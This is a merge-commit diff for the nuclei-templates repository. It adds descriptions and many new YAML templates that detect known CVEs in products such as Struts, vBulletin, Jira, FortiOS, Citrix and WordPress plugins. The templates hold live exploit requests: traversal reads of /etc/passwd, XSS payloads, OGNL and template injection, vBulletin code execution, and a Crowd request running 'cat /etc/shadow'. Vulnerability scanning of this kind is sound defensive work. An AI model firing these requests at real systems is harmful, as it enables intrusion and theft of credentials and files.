Merge pull request #345 from aqme/master

Add *description* property to nuclei-templates
patch-1
bauthard 2020-08-28 01:09:39 +05:30 committed by GitHub
commit 747aa48d09
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
125 changed files with 2198 additions and 46 deletions

View File

@ -4,6 +4,7 @@ info:
name: Oracle Content Server XSS
author: madrobot
severity: medium
description: The vulnerability can be used to include HTML or JavaScript code to the affected web page. The code is executed in the browser of users if they visit the manipulated site.
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
author: Random-Robbie
severity: high
description: Node.js 8.5.0 before 8.6.0 allows remote attackers to access unintended files, because a change to ".." handling was incompatible with the pathname validation used by unspecified community modules.
requests:
- method: GET

View File

@ -3,6 +3,7 @@ info:
author: "Random Robbie"
name: "Struts2 RCE "
severity: critical
description: Struts is vulnerable to remote command injection attacks through incorrectly parsing an attackers invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
# This template supports the detection part only.
# Do not test any website without permission

View File

@ -3,6 +3,7 @@ info:
author: "Harsh Bothra"
name: "Nginx Remote Integer Overflow"
severity: medium
description: Nginx versions since 0.5.6 up to and including 1.13.2 are vulnerable to integer overflow vulnerability in nginx range filter module resulting into leak of potentially sensitive information triggered by specially crafted request.
# This template supports the detection part only.
# Do not test any website without permission

View File

@ -4,6 +4,7 @@ info:
name: Jira IconURIServlet SSRF
author: Ice3man
severity: high
description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF).
requests:
- method: GET

View File

@ -4,7 +4,7 @@ info:
name: CVE-2017-9841
author: Random-Robbie
severity: High
description: Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP code via HTTP POST data beginning with a "<?php " substring, as demonstrated by an attack on a site with an exposed /vendor folder, i.e., external access to the /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php URI
# Reference to exploit
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
# https://github.com/RandomRobbieBF/phpunit-brute

View File

@ -4,6 +4,7 @@ info:
name: Jolokia XSS
author: mavericknerd
severity: high
description: An XSS vulnerability exists in the Jolokia agent version 1.3.7 in the HTTP servlet that allows an attacker to execute malicious javascript in the victim's browser.
requests:
- method: GET

View File

@ -4,7 +4,7 @@ info:
name: Nuxeo Authentication Bypass Remote Code Execution
author: madrobot
severity: high
description: Nuxeo Authentication Bypass Remote Code Execution &lt; 103 using a SSTI
requests:
- method: GET
path:

View File

@ -4,6 +4,7 @@ info:
name: Wordpress unauthenticated stored xss
author: nadino
severity: medium
description: process_forms in the WPML (aka sitepress-multilingual-cms) plugin through 3.6.3 for WordPress has XSS via any locale_file_name_ parameter (such as locale_file_name_en) in an authenticated theme-localization.php request to wp-admin/admin.php.
requests:
- method: POST

View File

@ -4,6 +4,7 @@ info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
author: madrobot & dwisiswant0
severity: high
description: XSS exists in the Administration Console in Oracle Secure Global Desktop 4.4 20080807152602 (but was fixed in later versions including 5.4)
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
severity: medium
description: The WallboardServlet resource in Jira before version 7.13.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the cyclePeriod parameter.
requests:
- method: GET

View File

@ -4,7 +4,7 @@ info:
name: Oracle WebCenter Sites XSS
author: madrobot
severity: medium
description: Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware
requests:
- method: GET
path:

View File

@ -4,6 +4,7 @@ info:
name: Nexus Repository Manager 3 RCE
auhtor: hetroublemakr
severity: high
description: Sonatype Nexus Repository before 3.21.2 allows JavaEL Injection (issue 1 of 2).
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:

View File

@ -4,6 +4,7 @@ info:
name: Sonatype Nexus Repository RCE
auhtor: hetroublemakr
severity: high
description: A Remote Code Execution vulnerability has been discovered in Nexus Repository Manager requiring immediate action. The vulnerability allows for an attacker with an administrative account on NXRM to execute arbitrary code by crafting a malicious request to NXRM
# reference: https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
requests:

View File

@ -4,7 +4,7 @@ info:
name: CVE-2020-12720 vBulletin SQLI
author: pdnuclei - projectdiscovery.io
severity: critical
description: vBulletin before 5.5.6pl1, 5.6.0 before 5.6.0pl1, and 5.6.1 before 5.6.1pl1 has incorrect access control.
# Source https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
# This template supports the detection part only.
# Do not test any website without permission

View File

@ -4,6 +4,7 @@ info:
name: Netsweeper WebAdmin unixlogin.php Python Code Injection
author: dwisiswant0
severity: critical
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and

View File

@ -4,6 +4,7 @@ info:
name: Unauthenticated Grafana DoS
author: pxmme1337
severity: medium
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
# Source:- https://www.exploit-db.com/exploits/48638
# WARNING

View File

@ -4,6 +4,7 @@ info:
name: Artica Web Proxy 4.30 OS Command Injection
author: dwisiswant0
severity: high
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
# Artica Web Proxy 4.30.00000000
# allows an authenticated remote attacker

View File

@ -4,6 +4,7 @@ info:
name: Artica Web Proxy 4.30 Authentication Bypass
author: dwisiswant0
severity: critical
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
# Artica Web Proxy 4.30.00000000
# allows remote attacker to bypass privilege detection

View File

@ -15,9 +15,9 @@ info:
requests:
- payloads:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- "sysctl kern.ostype" # macOS
port:
- "80"
- "443"

View File

@ -4,6 +4,7 @@ info:
name: IceWarp WebMail XSS
author: pdnuclei & dwisiswant0
severity: medium
description: In IceWarp Webmail Server through 11.4.4.1, there is XSS in the /webmail/ color parameter.
# source:- https://www.exploit-db.com/exploits/47988
# https://twitter.com/sagaryadav8742/status/1275170967527006208

View File

@ -4,6 +4,7 @@ info:
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
author: dwisiswant0
severity: high
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
requests:
- method: GET

View File

@ -4,6 +4,7 @@ info:
name: Apache Tomcat RCE by deserialization
author: dwisiswant0
severity: high
description: Apache Tomcat versions 10.0.0-M1 to 10.0.0-M4, 9.0.0.M1 to 9.0.34, 8.5.0 to 8.5.54 and 7.0.0 to 7.0.103 if a) an attacker is able to control the contents and name of a file on the server
requests:
- method: GET

View File

@ -4,6 +4,8 @@ info:
name: Apache OFBiz XML-RPC Java Deserialization
author: dwisiswant0
severity: medium
description: XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03
# This temaplte detects a Java deserialization vulnerability in Apache
# OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for

View File

@ -4,6 +4,7 @@ info:
name: SEOmatic < 3.3.0 Server-Side Template Injection
author: dwisiswant0
severity: high
description: The SEOmatic component before 3.3.0 for Craft CMS allows Server-Side Template Injection that leads to RCE via malformed data to the metacontainers controller.
requests:
- method: GET

View File

@ -5,16 +5,15 @@ info:
severity: high
requests:
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
# https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
# https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection
# https://github.com/grafana/grafana/issues/14755
# Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user.
# So make sure, not to attempt more than 4 password for same valid user.
- payloads:
# grafana_username:
# - admin
# grafana_username:
# - admin
grafana_password:
- prom-operator

View File

@ -4,6 +4,7 @@ info:
name: Security.txt File
author: bad5ect0r
severity: info
description: The website defines a security policy.
requests:
- method: GET

View File

@ -0,0 +1,22 @@
id: CVE-2017-10075
info:
name: Oracle Content Server XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=OO"
- "{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(31337)</script>"
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2017-14849
info:
name: Node.js 8.5.0 >=< 8.6.0 Directory Traversal
author: Random-Robbie
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/static/../../../a/../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,29 @@
id: CVE-2017-5638
info:
author: "Random Robbie"
name: "Struts2 RCE "
severity: critical
# This template supports the detection part only.
# Do not test any website without permission
# Exploit:- https://github.com/mazen160/struts-pwn
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data
Connection: Keep-Alive
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
matchers:
- type: word
words:
- "Bounty Plz"
part: header

View File

@ -0,0 +1,29 @@
id: CVE-2017-7529
info:
author: "Harsh Bothra"
name: "Nginx Remote Integer Overflow"
severity: medium
# This template supports the detection part only.
# Do not test any website without permission
# https://gist.githubusercontent.com/BlackVirusScript/75fae10a037c376555b0ad3f3da1a966/raw/d1cc081053636711881ea45c84e0971d5babe103/CVE-2017-7529.py
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Range: bytes=-17208,-9223372036854758792
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 206
- type: word
words:
- Content-Range
part: all

View File

@ -0,0 +1,16 @@
id: CVE-2017-9506
info:
name: Jira IconURIServlet SSRF
author: Ice3man
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/oauth/users/icon-uri?consumerUri=https://ipinfo.io/json"
matchers:
- type: word
words:
- "ipinfo.io/missingauth"
part: body

View File

@ -0,0 +1,36 @@
id: CVE-2017-9841
info:
name: CVE-2017-9841
author: Random-Robbie
severity: High
# Reference to exploit
# https://github.com/cyberharsh/Php-unit-CVE-2017-9841
# https://github.com/RandomRobbieBF/phpunit-brute
requests:
- method: GET
path:
- "{{BaseURL}}/sites/all/libraries/mailchimp/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/laravel_api/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/api/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/apps/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/backup/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/oldsite/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/lib/phpunit/phpunit/phpunit"
- "{{BaseURL}}/modules/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/old/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/zend/vendor/phpunit/phpunit/phpunit"
- "{{BaseURL}}/yii/vendor/phpunit/phpunit/phpunit"
matchers-condition: and
matchers:
- type: word
words:
- "this version of phpunit requires php 5"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,23 @@
id: CVE-2018-0296
info:
name: Cisco ASA path traversal vulnerability
author: organiccrap
severity: medium
# https://github.com/yassineaboukir/CVE-2018-0296
# curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
# if vulnerable, curl -k --path-as-is https://host/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/number
requests:
- method: GET
path:
- "{{BaseURL}}/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions"
matchers-condition: and
matchers:
- type: word
words:
- "///sessions"
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,22 @@
id: CVE-2018-1000129
info:
name: Jolokia XSS
author: mavericknerd
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
- "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1337)>"
part: body

View File

@ -0,0 +1,22 @@
id: CVE-2018-11409
info:
name: Splunk Sensitive Information Disclosure
author: Harsh Bothra
severity: medium
# source:- https://nvd.nist.gov/vuln/detail/CVE-2018-11409
requests:
- method: GET
path:
- '{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json'
- '{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- licenseKeys

View File

@ -0,0 +1,23 @@
id: CVE-2018-11759
info:
name: Apache Tomcat JK Status Manager Access
author: Harsh Bothra
severity: medium
# Source:- https://github.com/immunIT/CVE-2018-11759
requests:
- method: GET
path:
- '{{BaseURL}}/jkstatus'
- '{{BaseURL}}/jkstatus;'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "JK Status Manager"

View File

@ -0,0 +1,22 @@
id: CVE-2018-1247
info:
name: RSA Authentication Manager XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/IMS-AA-IDP/common/scripts/iua/pmfso.swf?sendUrl=/&gotoUrlLocal=javascript:alert(1337)//"
matchers-condition: and
matchers:
- type: word
words:
- "application/x-shockwave-flash"
part: header
- type: word
words:
- "javascript:alert(1337)"
part: body

View File

@ -0,0 +1,21 @@
id: CVE-2018-1271
info:
name: Spring MVC Directory Traversal Vulnerability
author: hetroublemakr
severity: High
# reference: https://medium.com/@knownsec404team/analysis-of-spring-mvc-directory-traversal-vulnerability-cve-2018-1271-b291bdb6be0d
requests:
- method: GET
path:
- '{{BaseURL}}/static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
- '{{BaseURL}}/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini'
matchers-condition: and
matchers:
- type: word
words:
- 'for 16-bit app support'
- type: status
status:
- 200

View File

@ -0,0 +1,15 @@
id: CVE-2018-13379
info:
name: FortiOS - Credentials Disclosure
author: organiccrap
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
matchers:
- type: word
words:
- "var fgt_lang ="

View File

@ -0,0 +1,19 @@
id: CVE-2018-14728
info:
name: Responsive filemanager 9.13.1 - SSRF/LFI
author: madrobot
severity: high
requests:
- method: POST
path:
- "{{BaseURL}}/filemanager/upload.php"
body: "fldr=&url=file:///etc/passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,16 @@
id: CVE-2018-16341
info:
name: Nuxeo Authentication Bypass Remote Code Execution
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/nuxeo/login.jsp/pwn${31333333330+7}.xhtml"
matchers:
- type: word
words:
- "31333333337"
part: body

View File

@ -0,0 +1,17 @@
id: CVE-2018-18069
info:
name: Wordpress unauthenticated stored xss
author: nadino
severity: medium
requests:
- method: POST
path:
- "{{BaseURL}}/wp-admin/admin.php"
body: 'icl_post_action=save_theme_localization&locale_file_name_en=EN\"><html xmlns=\"hacked'
matchers:
- type: dsl
dsl:
- 'status_code==302 && contains(set_cookie, "_icl_current_admin_language")'

View File

@ -0,0 +1,16 @@
id: CVE-2018-19439
info:
name: Cross Site Scripting in Oracle Secure Global Desktop Administration Console
author: madrobot & dwisiswant0
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp?=&windowTitle=AdministratorHelpWindow></TITLE></HEAD><body><script>alert(1337)</script><!--&>helpFile=concepts.html"
matchers:
- type: word
words:
- "<script>alert(1337)</script><!--</TITLE>"
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2018-20824
info:
name: Atlassian Jira WallboardServlet XSS
author: madrobot & dwisiswant0
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- (?mi)timeout:\salert\(document\.domain\)
part: body

View File

@ -0,0 +1,16 @@
id: CVE-2018-2791
info:
name: Oracle WebCenter Sites XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers:
- type: word
words:
- "<script>alert(1337)</script>"
part: body

View File

@ -0,0 +1,19 @@
id: CVE-2018-3714
info:
name: node-srv Path Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/node_modules/../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2018-3760
info:
name: Rails cve-2018-3760
author: 0xrudra
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/assets/file:%2f%2f/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2018-5230
info:
name: Atlassian Confluence Status-List XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/pages/includes/status-list-mo%3CIFRAME%20SRC%3D%22javascript%3Aalert%281337%29%22%3E.vm"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "SRC=\"javascript:alert(1337)\">"
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2018-7490
info:
name: uWSGI PHP Plugin Directory Traversal
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2019-10475
info:
name: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plugin/build-metrics/getBuildStats?label=%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<svg/onload=alert(1337)>"
part: body

View File

@ -0,0 +1,19 @@
id: CVE-2019-11248
info:
name: exposed_pprof
author: 0xceeb
severity: medium
# https://medium.com/bugbountywriteup/my-first-bug-bounty-21d3203ffdb0
# http://mmcloughlin.com/posts/your-pprof-is-showing
requests:
- method: GET
path:
- "{{BaseURL}}/debug/pprof/"
matchers:
- type: word
words:
- "Types of profiles available:"
- "Profile Descriptions"

View File

@ -0,0 +1,21 @@
id: CVE-2019-11510
info:
name: Pulse Connect Secure SSL VPN arbitrary file read vulnerability
author: organiccrap
severity: high
# https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,38 @@
id: CVE-2019-11580
info:
name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
author: dwisiswant0
severity: critical
# Atlassian Crowd and Crowd Data Center
# had the pdkinstall development plugin incorrectly enabled in release builds.
# Attackers who can send unauthenticated or authenticated requests
# to a Crowd or Crowd Data Center instance can exploit this vulnerability
# to install arbitrary plugins, which permits remote code execution on
# systems running a vulnerable version of Crowd or Crowd Data Center.
# All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
# from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
# from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
# from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
# and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
# -
# References:
# > https://github.com/jas502n/CVE-2019-11580
requests:
- method: GET
path:
- "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
- "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
matchers-condition: and
matchers:
- type: word
words:
- "root:*:"
- "bin:*:"
condition: and
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,20 @@
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 LFIl
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body

View File

@ -0,0 +1,25 @@
id: CVE-2019-14322
info:
name: Odoo 12.0 - Local File Inclusion
author: madrobot
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/base_import/static/c:/windows/win.ini"
- "{{BaseURL}}/web/static/c:/windows/win.ini"
- "{{BaseURL}}/base/static/c:/windows/win.ini"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

View File

@ -0,0 +1,20 @@
id: CVE-2019-14974
info:
name: SugarCRM Enterprise 9.0.0 - Cross-Site Scripting
author: madrobot
severity: low
requests:
- method: GET
path:
- "{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "url = window.location.search.split(\"?desktop_url=\")[1]"
part: body

View File

@ -0,0 +1,23 @@
id: CVE-2019-15043
info:
author: bing0o
name: Grafana unauthenticated API
severity: medium
requests:
- body: >-
{"dashboard":
{"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows":
[{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires":
3600}
headers:
Content-Type: application/json
Host: '{{Hostname}}'
User-Agent: Mozilla/5.0
matchers:
- part: body
type: word
words:
- deleteKey
method: POST
path:
- '{{BaseURL}}/api/snapshots'

View File

@ -0,0 +1,25 @@
id: CVE-2019-16759-1
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4 fix bypass
author: madrobot
severity: high
# Source:- https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/
requests:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "PHP Version"

View File

@ -0,0 +1,25 @@
id: CVE-2019-16759
info:
name: 0day RCE in vBulletin v5.0.0-v5.5.4
author: dwisiswant0
severity: high
requests:
- raw:
- |
POST /index.php?routestring=ajax/render/widget_php HTTP/1.1
widgetConfig[code]=echo%20%27bm9uZXhpc3RlbnQ6MTMzNwo=%27%20|%20base64%20-d;%20exit;
- |
POST / HTTP/1.1
{"routestring":"ajax\/render\/widget_php","widgetConfig[code]":"echo 'bm9uZXhpc3RlbnQ6MTMzNwo=' | base64 -d; exit;"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "nonexistent:1337"

View File

@ -0,0 +1,21 @@
id: CVE-2019-17382
info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: Critical
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
requests:
- method: GET
path:
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"

View File

@ -0,0 +1,17 @@
id: CVE-2019-18394
info:
name: Openfire Full Read SSRF
author: pdteam - nuclei.projectdiscovery.io
severity: critical
# Source:- https://swarm.ptsecurity.com/openfire-admin-console/
requests:
- method: GET
path:
- "{{BaseURL}}/getFavicon?host=burpcollaborator.net"
matchers:
- type: word
words:
- <h1>Burp Collaborator Server</h1>

View File

@ -0,0 +1,20 @@
id: CVE-2019-19368
info:
name: Rumpus FTP Web File Manager 8.2.9.1 XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "value=''><sVg/OnLoAD=alert`1337`//'>"
part: body

View File

@ -0,0 +1,15 @@
id: CVE-2019-19781
info:
name: Citrix ADC Directory Traversal
author: organiccrap
severity: high
requests:
- method: GET
path:
- "{{BaseURL}}/vpn/../vpns/cfg/smb.conf"
matchers:
- type: word
words:
- "[global]"

View File

@ -0,0 +1,20 @@
id: CVE-2019-19908
info:
name: phpMyChat-Plus XSS
author: madrobot
severity: medium
requests:
- method: GET
path:
- "{{BaseURL}}/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<script>alert(1337)</script>"
part: body

View File

@ -0,0 +1,33 @@
id: CVE-2019-19985
info:
name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
author: KBA@SOGETI_ESEC, madrobot & dwisiswant0
severity: medium
# Source:- https://www.exploit-db.com/exploits/48698
requests:
- method: GET
path:
- "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all"
matchers-condition: and
matchers:
- type: word
words:
- Name
- Email
- Status
- Created On
condition: and
